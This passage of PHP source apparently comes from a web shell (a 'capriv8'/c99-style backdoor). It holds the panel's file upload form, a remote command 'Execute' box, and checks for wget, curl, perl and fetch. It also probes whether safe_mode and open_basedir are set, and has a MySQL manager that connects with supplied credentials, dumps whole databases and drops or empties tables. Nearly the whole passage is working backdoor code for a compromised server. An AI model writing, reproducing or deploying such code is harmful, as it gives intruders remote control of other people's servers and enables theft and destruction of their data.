  542.       $world["execute"] = ($mode & 00001)?"x":"-";
  543.       if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  544.       if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  545.       if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  546.       return $type.join("",$owner).join("",$group).join("",$world);
  547.     }
  548.   }
  549.   if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  550.   if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  551.   if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  552.   if (!function_exists("parse_perms")) {
  553.     function parse_perms($mode) {
  554.       if (($mode & 0xC000) === 0xC000) {$t = "s";}
  555.       elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  556.       elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  557.       elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  558.       elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  559.       elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  560.       elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  561.       else {$t = "?";}
  562.       $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  563.       $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  564.       $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  565.       return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  566.     }
  567.   }
  568.   if (!function_exists("parsesort")) {
  569.     function parsesort($sort) {
  570.       $one = intval($sort);
  571.       $second = substr($sort,-1);
  572.       if ($second != "d") {$second = "a";}
  573.       return array($one,$second);
  574.     }
  575.   }
  576.   if (!function_exists("view_perms_color")) {
  577.     function view_perms_color($o) {
  578.       if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  579.       elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  580.       else {return "<font color=#4C83AF>".view_perms(fileperms($o))."</font>";}
  581.     }
  582.   }
  583.   if (!function_exists("mysql_dump")) {
  584.     function mysql_dump($set) {
  585.       global $sh_ver;
  586.       $sock = $set["sock"];
  587.       $db = $set["db"];
  588.       $print = $set["print"];
  589.       $nl2br = $set["nl2br"];
  590.       $file = $set["file"];
  591.       $add_drop = $set["add_drop"];
  592.       $tabs = $set["tabs"];
  593.       $onlytabs = $set["onlytabs"];
  594.       $ret = array();
  595.       $ret["err"] = array();
  596.       if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  597.       if (empty($db)) {$db = "db";}
  598.       if (empty($print)) {$print = 0;}
  599.       if (empty($nl2br)) {$nl2br = 0;}
  600.       if (empty($add_drop)) {$add_drop = TRUE;}
  601.       if (empty($file)) {
  602.         $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  603.       }
  604.       if (!is_array($tabs)) {$tabs = array();}
  605.       if (empty($add_drop)) {$add_drop = TRUE;}
  606.       if (sizeof($tabs) == 0) {
  607.         $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  608.         if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  609.       }
  610.       $out = "
  611.      # Dumped by ".$sh_name."
  612.      #
  613.      # Host settings:
  614.      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  615.      # Date: ".date("d.m.Y H:i:s")."
  616.      # DB: \"".$db."\"
  617.      #---------------------------------------------------------";
  618.       $c = count($onlytabs);
  619.       foreach($tabs as $tab) {
  620.         if ((in_array($tab,$onlytabs)) or (!$c)) {
  621.           if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  622.           $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  623.           if (!$res) {$ret["err"][] = mysql_smarterror();}
  624.           else {
  625.             $row = mysql_fetch_row($res);
  626.             $out .= $row["1"].";\n\n";
  627.             $res = mysql_query("SELECT * FROM `$tab`", $sock);
  628.             if (mysql_num_rows($res) > 0) {
  629.               while ($row = mysql_fetch_assoc($res)) {
  630.                 $keys = implode("`, `", array_keys($row));
  631.                 $values = array_values($row);
  632.                 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  633.                 $values = implode("', '", $values);
  634.                 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  635.                 $out .= $sql;
  636.               }
  637.             }
  638.           }
  639.         }
  640.       }
  641.       $out .= "#---------------------------------------------------------------------------------\n\n";
  642.       if ($file) {
  643.         $fp = fopen($file, "w");
  644.         if (!$fp) {$ret["err"][] = 2;}
  645.         else {
  646.           fwrite ($fp, $out);
  647.           fclose ($fp);
  648.         }
  649.       }
  650.       if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  651.       return $out;
  652.     }
  653.   }
  654.   if (!function_exists("mysql_buildwhere")) {
  655.     function mysql_buildwhere($array,$sep=" and",$functs=array()) {
  656.       if (!is_array($array)) {$array = array();}
  657.       $result = "";
  658.       foreach($array as $k=>$v) {
  659.         $value = "";
  660.         if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  661.         $value .= "'".addslashes($v)."'";
  662.         if (!empty($functs[$k])) {$value .= ")";}
  663.         $result .= "`".$k."` = ".$value.$sep;
  664.       }
  665.       $result = substr($result,0,strlen($result)-strlen($sep));
  666.       return $result;
  667.     }
  668.   }
  669.   if (!function_exists("mysql_fetch_all")) {
  670.     function mysql_fetch_all($query,$sock) {
  671.       if ($sock) {$result = mysql_query($query,$sock);}
  672.       else {$result = mysql_query($query);}
  673.       $array = array();
  674.       while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  675.       mysql_free_result($result);
  676.       return $array;
  677.     }
  678.   }
  679.   if (!function_exists("mysql_smarterror")) {
  680.     function mysql_smarterror($type,$sock) {
  681.       if ($sock) {$error = mysql_error($sock);}
  682.       else {$error = mysql_error();}
  683.       $error = htmlspecialchars($error);
  684.       return $error;
  685.     }
  686.   }
  687.   if (!function_exists("mysql_query_form")) {
  688.     function mysql_query_form() {
  689.       global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  690.       if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  691.       if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
  692.       if ((!$submit) or ($sql_x)) {
  693.         echo "<table border=0><tr><td><form name=\"capriv8_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
  694.         if ($tbl_struct) {
  695.           echo "<td valign=\"top\"><b>Fields:</b><br>";
  696.           foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.capriv8_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  697.           echo "</td></tr></table>";
  698.         }
  699.       }
  700.       if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  701.     }
  702.   }
  703.   if (!function_exists("mysql_create_db")) {
  704.     function mysql_create_db($db,$sock="") {
  705.       $sql = "CREATE DATABASE `".addslashes($db)."`;";
  706.       if ($sock) {return mysql_query($sql,$sock);}
  707.       else {return mysql_query($sql);}
  708.     }
  709.   }
  710.   if (!function_exists("mysql_query_parse")) {
  711.     function mysql_query_parse($query) {
  712.       $query = trim($query);
  713.       $arr = explode (" ",$query);
  714.       $types = array(
  715.         "SELECT"=>array(3,1),
  716.         "SHOW"=>array(2,1),
  717.         "DELETE"=>array(1),
  718.         "DROP"=>array(1)
  719.       );
  720.       $result = array();
  721.       $op = strtoupper($arr[0]);
  722.       if (is_array($types[$op])) {
  723.         $result["propertions"] = $types[$op];
  724.         $result["query"]  = $query;
  725.         if ($types[$op] == 2) {
  726.           foreach($arr as $k=>$v) {
  727.             if (strtoupper($v) == "LIMIT") {
  728.               $result["limit"] = $arr[$k+1];
  729.               $result["limit"] = explode(",",$result["limit"]);
  730.               if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  731.               unset($arr[$k],$arr[$k+1]);
  732.             }
  733.           }
  734.         }
  735.       }
  736.       else {return FALSE;}
  737.     }
  738.   }
  739.   if (!function_exists("cafsearch")) {
  740.     function cafsearch($d) {
  741.       global $found;
  742.       global $found_d;
  743.       global $found_f;
  744.       global $search_i_f;
  745.       global $search_i_d;
  746.       global $a;
  747.       if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  748.       $h = opendir($d);
  749.       while (($f = readdir($h)) !== FALSE) {
  750.         if($f != "." && $f != "..") {
  751.           $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  752.           if (is_dir($d.$f)) {
  753.             $search_i_d++;
  754.             if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  755.             if (!is_link($d.$f)) {cafsearch($d.$f);}
  756.           }
  757.           else {
  758.             $search_i_f++;
  759.             if ($bool) {
  760.               if (!empty($a["text"])) {
  761.                 $r = @file_get_contents($d.$f);
  762.                 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  763.                 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  764.                 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  765.                 else {$bool = strpos(" ".$r,$a["text"],1);}
  766.                 if ($a["text_not"]) {$bool = !$bool;}
  767.                 if ($bool) {$found[] = $d.$f; $found_f++;}
  768.               }
  769.               else {$found[] = $d.$f; $found_f++;}
  770.             }
  771.           }
  772.         }
  773.       }
  774.       closedir($h);
  775.     }
  776.   }
  777.   if ($x == "gofile") {
  778.     if (is_dir($f)) { $x = "ls"; $d = $f; }
  779.     else { $x = "f"; $d = dirname($f); $f = basename($f); }
  780.   }
  781.   @ob_start();
  782.   @ob_implicit_flush(0);
  783.   function onphpshutdown() {
  784.     global $gzipencode,$ft;
  785.     if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
  786.       $v = @ob_get_contents();
  787.       @ob_end_clean();
  788.       @ob_start("ob_gzHandler");
  789.       echo $v;
  790.       @ob_end_flush();
  791.     }
  792.   }
  793.   function capriv8exit() {
  794.     onphpshutdown();
  795.     exit;
  796.   }
  797.   header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  798.   header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  799.   header("Cache-Control: no-store, no-cache, must-revalidate");
  800.   header("Cache-Control: post-check=0, pre-check=0", FALSE);
  801.   header("Pragma: no-cache");
  802.   if (empty($tmpdir)) {
  803.     $tmpdir = ini_get("upload_tmp_dir");
  804.     if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  805.   }
  806.   $tmpdir = realpath($tmpdir);
  807.   $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  808.   if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  809.   if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  810.   else {$tmpdir_logs = realpath($tmpdir_logs);}
  811.   function showstat($stat) {
  812.     if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
  813.     else { return "<font color=#FF9900><b>OFF</b></font>"; }
  814.   }
  815.   function testperl() {
  816.     if (ex('perl -h')) { return showstat("on"); }
  817.     else { return showstat("off"); }
  818.   }
  819.   function testfetch() {
  820.     if(ex('fetch --help')) { return showstat("on"); }
  821.     else { return showstat("off"); }
  822.   }
  823.   function testwget() {
  824.     if (ex('wget --help')) { return showstat("on"); }
  825.     else { return showstat("off"); }
  826.   }
  827.   function testoracle() {
  828.     if (function_exists('ocilogon')) { return showstat("on"); }
  829.     else { return showstat("off"); }
  830.   }
  831.   function testpostgresql() {
  832.     if (function_exists('pg_connect')) { return showstat("on"); }
  833.     else { return showstat("off"); }
  834.   }
  835.   function testmssql() {
  836.     if (function_exists('mssql_connect')) { return showstat("on"); }
  837.     else { return showstat("off"); }
  838.   }
  839.   function testcurl() {
  840.     if (function_exists('curl_version')) { return showstat("on"); }
  841.     else { return showstat("off"); }
  842.   }
  843.   function testmysql() {
  844.     if (function_exists('mysql_connect')) { return showstat("on"); }
  845.     else { return showstat("off"); }
  846.   }
  847.   function showdisablefunctions() {
  848.     if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900><b>".$disablefunc."</b></font>"; }
  849.     else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
  850.   }
  851.   if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
  852.     $safemode = TRUE;
  853.     $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>";
  854.   }
  855.   else {
  856.     $safemode = FALSE;
  857.     $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF (Not Secure)</b></font>";
  858.   }
  859.   $v = @ini_get("open_basedir");
  860.   if ($v or strtolower($v) == "on") {
  861.     $openbasedir = TRUE;
  862.     $hopenbasedir = "<font color=red>".$v."</font>";
  863.   }
  864.   else {
  865.     $openbasedir = FALSE;
  866.     $hopenbasedir = "<font color=#4C83AF>OFF (not secure)</font>";
  867.   }
  868.   $sort = htmlspecialchars($sort);
  869.   if (empty($sort)) {$sort = $sort_default;}
  870.   $sort[1] = strtolower($sort[1]);
  871.   $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  872.   if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  873.   $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."x=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  874.   @ini_set("highlight.bg",$highlight_bg);
  875.   @ini_set("highlight.comment",$highlight_comment);
  876.   @ini_set("highlight.default",$highlight_default);
  877.   @ini_set("highlight.html",$highlight_html);
  878.   @ini_set("highlight.keyword",$highlight_keyword);
  879.   @ini_set("highlight.string",$highlight_string);
  880.   if (!is_array($actbox)) { $actbox = array(); }
  881.   $dspact = $x = htmlspecialchars($x);
  882.   $disp_fullpath = $ls_arr = $notls = null;
  883.   $ud = urlencode($d);
  884.   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  885.   if (empty($d)) {$d = realpath(".");}
  886.   elseif(realpath($d)) {$d = realpath($d);}
  887.   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  888.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  889.   $d = str_replace("\\\\","\\",$d);
  890.   $dispd = htmlspecialchars($d);
  891. echo $html_start;
  892. echo "<table id=pagebar><tr><td width=30%><p>".
  893.      "<h1><font color='#4C83AF'>$b_name</font></h1>".
  894.      "$b_version<br/>".
  895.      "web site  :<a href='$sh_mainurl' target=_blank> $sh_mainurl</a><br/> password : $md5_pass";
  896. echo "</p></td>".
  897.      "<td width=70%><p>Server IP : <a href=http://www.ip-adress.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ".
  898.      "Your IP : <a href=http://www.ip-adress.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>";
  899. if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
  900. echo  "OS : ".php_uname()."";
  901. echo "<br/>Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."x=phpini>php.ini</a><br>".
  902.      "$hsafemode<br>";
  903. echo "<p class=fleft>";
  904. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  905. $i = 0;
  906. foreach($pd as $b) {
  907.   $t = ""; $j = 0;
  908.   foreach ($e as $r) {
  909.     $t.= $r.DIRECTORY_SEPARATOR;
  910.     if ($j == $i) { break; }
  911.     $j++;
  912.   }
  913.   echo "<a href=\"".$surl."x=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=red>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
  914.   $i++;
  915. }
  916. echo "</p></td></tr>";
  917. echo "<tr><td colspan=2 id=mainmenu>";
  918. if (count($quicklaunch2) > 0) {
  919.   foreach($quicklaunch2 as $item) {
  920.     $item[1] = str_replace("%d",urlencode($d),$item[1]);
  921.     $item[1] = str_replace("%sort",$sort,$item[1]);
  922.     $v = realpath($d."..");
  923.     if (empty($v)) {
  924.       $a = explode(DIRECTORY_SEPARATOR,$d);
  925.       unset($a[count($a)-2]);
  926.       $v = join(DIRECTORY_SEPARATOR,$a);
  927.     }
  928.     $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  929.     echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
  930.   }
  931. }
  932. echo "<tr><td colspan=2><p>";
  933. echo "<table><tr><td align=center><form method='POST' enctype='multipart/form-data'><input type=hidden name=x value='upload'><input type=hidden name='miniform' value='1'><input type='file' name='uploadfile'> - <input type=submit name=submit value='Upload'></form>
  934.      </td><td align=center><form method='POST'>
  935.      <input type=hidden name=x value='cmd'>
  936.      <input type=hidden name='d' value='$dispd'>
  937.      <input type='text' name='cmd' size='30' value='$command'>
  938.      <input type=hidden name='cmd_txt' value='1'> - <input type=submit name=submit value='Execute'>
  939.      </form></td>
  940.      <td align=center><form method='POST'><input type=hidden name=x value='gofile'><input type=hidden name='d' value='$dispd'>
  941.      <input type='text' name='f' size='70' value='$dispd'> - <input type=submit value='View'>
  942.       </form></td></tr></table>";
  943. echo "</p></td></tr>";
  944.  
  945. ?>
  946. </td></tr></table>
  947. <?php
  948. echo "<table id=maininfo><tr><td width=\"100%\">\n";
  949. if ($x == "") { $x = $dspact = "ls"; }
  950. if ($x == "phpini" ) { get_phpini(); }
  951. if ($x == "sql") {
  952.   $sql_surl = $surl."x=sql";
  953.   if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  954.   if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  955.   if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  956.   if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  957.   if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  958.   $sql_surl .= "&";
  959.   echo "<table>".
  960.        "<tr><td width=\"100%\" colspan=2 class=barheader>";
  961.   if ($sql_server) {
  962.     $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  963.     $err = mysql_smarterror();
  964.     @mysql_select_db($sql_db,$sql_sock);
  965.     if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  966.   }
  967.   else {$sql_sock = FALSE;}
  968.   echo ".: SQL Manager :.<br>";
  969.   if (!$sql_sock) {
  970.     if (!$sql_server) {echo "NO CONNECTION";}
  971.     else {echo "Can't connect! ".$err;}
  972.   }
  973.   else {
  974.     $sqlquicklaunch = array();
  975.     $sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  976.     $sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
  977.     $sqlquicklaunch[] = array("Server-status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
  978.     $sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
  979.     $sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
  980.     $sqlquicklaunch[] = array("Logout",$surl."x=sql");
  981.     echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
  982.     if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  983.   }
  984.   echo "</td></tr><tr>";
  985.   if (!$sql_sock) {
  986.     echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"x\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr>
  987.           </table><table><tr><td width=\"50%\" align=\"left\"><b>Host</b></td><td width=\"50%\"><b>PORT</b></td></tr><tr><td align=left><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td></tr>
  988.           </table><table><tr><td align=\"center\"><input type=\"submit\" value=\"Connect\"></td></tr></tr><tr><td></td></tr></form></table></td>";
  989.   }
  990.   else {
  991.     if (!empty($sql_db)) {
  992.       ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
  993.       <?php
  994.       $result = mysql_list_tables($sql_db);
  995.       if (!$result) {echo mysql_smarterror();}
  996.       else {
  997.         echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  998.         $c = 0;
  999.         while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  1000.         if (!$c) {echo "No tables found in database.";}
  1001.       }
  1002.     }
  1003.     else {
  1004.       ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
  1005.       <?php
  1006.       $result = mysql_list_dbs($sql_sock);
  1007.       if (!$result) {echo mysql_smarterror();}
  1008.       else {
  1009.         ?><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
  1010.         <?php
  1011.         $c = 0;
  1012.         $dbs = "";
  1013.         while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1014.         echo "<option value=\"\">Databases (".$c.")</option>";
  1015.         echo $dbs;
  1016.       }
  1017.       ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
  1018.       <?php
  1019.     }
  1020.     echo "</td><td width=\"100%\">";
  1021.     $diplay = TRUE;
  1022.     if ($sql_db) {
  1023.       if (!is_numeric($c)) {$c = 0;}
  1024.       if ($c == 0) {$c = "no";}
  1025.       echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  1026.       if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1027.       echo "</b></center>";
  1028.       $acts = array("","dump");
  1029.       if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
  1030.       elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
  1031.       elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
  1032.       elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
  1033.       elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
  1034.       elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
  1035.       elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
  1036.       elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
  1037.       elseif ($sql_tbl_x == "insert") {
  1038.         if ($sql_tbl_insert_radio == 1) {
  1039.           $keys = "";
  1040.           $akeys = array_keys($sql_tbl_insert);
  1041.           foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1042.           if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1043.           $values = "";
  1044.           $i = 0;
  1045.           foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1046.           if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1047.           $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1048.           $sql_x = "query";
  1049.           $sql_tbl_x = "browse";
  1050.         }
  1051.         elseif ($sql_tbl_insert_radio == 2) {
  1052.           $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1053.           $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1054.           $result = mysql_query($sql_query) or print(mysql_smarterror());
  1055.           $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1056.           $sql_x = "query";
  1057.           $sql_tbl_x = "browse";
  1058.         }
  1059.       }
  1060.       if ($sql_x == "query") {
  1061.         echo "<hr size=\"1\" noshade>";
  1062.         if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1063.         if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
